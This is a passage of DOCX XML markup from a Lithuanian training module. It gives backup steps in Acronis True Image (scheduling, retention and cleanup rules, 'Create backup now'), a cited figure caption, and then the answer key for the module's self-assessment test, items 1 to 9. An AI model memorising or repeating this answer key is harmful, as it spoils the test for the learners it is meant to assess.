      <w:r w:rsidR="000173C5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ekomenduojame nustatyti tvarkaraštį arba reguliariai kurti atsargines sistemos atsargines kopijas. Jei pasirinksite parinktį</w:t>
      </w:r>
      <w:r w:rsidR="1AEA052A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Ne</w:t>
      </w:r>
      <w:r w:rsidR="0008093D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>su</w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>planuoti</w:t>
      </w:r>
      <w:r w:rsidR="0076500F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, atsarginės kopijos užduotį turėsite paleisti rankiniu būdu</w:t>
      </w:r>
      <w:r w:rsidR="00446D88" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kiekvieną kartą naudodami mygtuką</w:t>
      </w:r>
      <w:r w:rsidR="12087E87" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Kurti atsarginę kopiją dabar</w:t>
      </w:r>
      <w:r w:rsidR="0076500F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648BC947" w14:textId="046328A7" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="00330F1D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>11.</w:t>
      </w:r>
      <w:r w:rsidR="000173C5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Rekomenduojama nustatyti, kiek laiko atsarginės kopijos turėtų būti saugomos, kitaip atsarginės kopijos greitai užpildys saugyklą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C174236" w14:textId="1B80AE7F" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="00330F1D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>12.</w:t>
      </w:r>
      <w:r w:rsidR="000173C5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Jei atsargines kopijas saugote (USB </w:t>
      </w:r>
      <w:r w:rsidR="7565C085" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>išoriniame diske</w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, NAS</w:t>
      </w:r>
      <w:r w:rsidR="4D6C84F1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ir kt.), „Backup Scheme“ nustatykite valymo taisykles. Jei nesate tikri,</w:t>
      </w:r>
      <w:r w:rsidR="7947C15B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> kurias </w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>parinktis pasirinkti, palikite numatytąjį pasirinkim</w:t>
      </w:r>
      <w:r w:rsidR="000173C5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ą</w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000173C5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Jei saugote atsargines kopijas debesyje, nustatykite valymo taisykles skiltyje</w:t>
      </w:r>
      <w:r w:rsidR="000173C5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00D33249" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Išplėstinė</w:t>
      </w:r>
      <w:r w:rsidR="00D33249" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>“.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C427A5" w14:textId="3521CBE2" w:rsidR="00330F1D" w:rsidRPr="005A5C28" w:rsidRDefault="00330F1D" w:rsidP="0089230F">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>13.</w:t>
      </w:r>
      <w:r w:rsidR="000173C5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Spustelėkite</w:t>
      </w:r>
      <w:r w:rsidR="000173C5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Kurti atsarginę kopiją daba</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>r“</w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> arba paspauskite mygtuką </w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>odyklė žemyn“</w:t>
      </w:r>
      <w:r w:rsidR="68ADA71E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36750D59" w14:textId="09737D17" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="540F2866" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23673998" wp14:editId="073FFA78">
            <wp:extent cx="3657600" cy="2466975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1015203774" name="Picture 101520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203774"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId239">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3657600" cy="2466975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C04B1BF" w14:textId="1BE57231" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="00BF7B83" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>27</w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pav. Acronis True Image įrankis</w:t>
      </w:r>
      <w:r w:rsidR="00D33249" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>skirtas duomenų kopijoms kurti.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D47126F" w14:textId="6901756C" w:rsidR="1DB77C64" w:rsidRPr="005A5C28" w:rsidRDefault="4062475D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Šaltinis: Acronis True Image 2021: how to back up entire </w:t>
      </w:r>
      <w:r w:rsidR="14558E11" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">computer. (2020, gruodžio 11). </w:t>
      </w:r>
      <w:r w:rsidR="14558E11" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Acronis Knowledge Base. </w:t>
      </w:r>
      <w:r w:rsidR="14558E11" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Prieiga</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId240">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://kb.acronis.com/content/65468</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="67C9ABD2" w14:textId="6901756C" w:rsidR="009F2FBB" w:rsidRPr="005A5C28" w:rsidRDefault="009F2FBB" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B96DC3F" w14:textId="77777777" w:rsidR="002A5374" w:rsidRPr="005A5C28" w:rsidRDefault="002A5374" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">12 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>TESTAS, SKIRTAS ĮSIVERTINTI MODULIO TEORINIŲ ŽINIŲ GEBĖJIMUS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EFA3F2" w14:textId="4B41D9C4" w:rsidR="00831534" w:rsidRPr="005A5C28" w:rsidRDefault="106FA56A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ATSAKYMAI:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D62AB61" w14:textId="77777777" w:rsidR="00753244" w:rsidRPr="005A5C28" w:rsidRDefault="70537475" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">1 – </w:t>
      </w:r>
      <w:r w:rsidR="1117D0B1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669F71AA" w14:textId="77777777" w:rsidR="00753244" w:rsidRPr="005A5C28" w:rsidRDefault="70537475" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">2 – </w:t>
      </w:r>
      <w:r w:rsidR="1117D0B1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A837A0" w14:textId="1E10FB46" w:rsidR="00753244" w:rsidRPr="005A5C28" w:rsidRDefault="70537475" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>3 – A;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3390228D" w14:textId="0C845F29" w:rsidR="00753244" w:rsidRPr="005A5C28" w:rsidRDefault="70537475" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">4 – </w:t>
      </w:r>
      <w:r w:rsidR="1117D0B1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46300A00" w14:textId="77777777" w:rsidR="00753244" w:rsidRPr="005A5C28" w:rsidRDefault="70537475" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">5 – </w:t>
      </w:r>
      <w:r w:rsidR="1117D0B1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE87B9F" w14:textId="4D435A3F" w:rsidR="00753244" w:rsidRPr="005A5C28" w:rsidRDefault="70537475" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">6 – </w:t>
      </w:r>
      <w:r w:rsidR="1117D0B1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2081BA57" w14:textId="77777777" w:rsidR="00753244" w:rsidRPr="005A5C28" w:rsidRDefault="70537475" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">7 </w:t>
      </w:r>
      <w:r w:rsidR="17E13997" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="1117D0B1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="17E13997" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9120A1" w14:textId="2BE9FF20" w:rsidR="00753244" w:rsidRPr="005A5C28" w:rsidRDefault="17E13997" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">8 – </w:t>
      </w:r>
      <w:r w:rsidR="1117D0B1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70546802" w14:textId="77777777" w:rsidR="00753244" w:rsidRPr="005A5C28" w:rsidRDefault="17E13997" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">9 – </w:t>
      </w:r>
      <w:r w:rsidR="1117D0B1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="371EE17E" w:rsidRPr="005A5C28">
        <w:rPr>
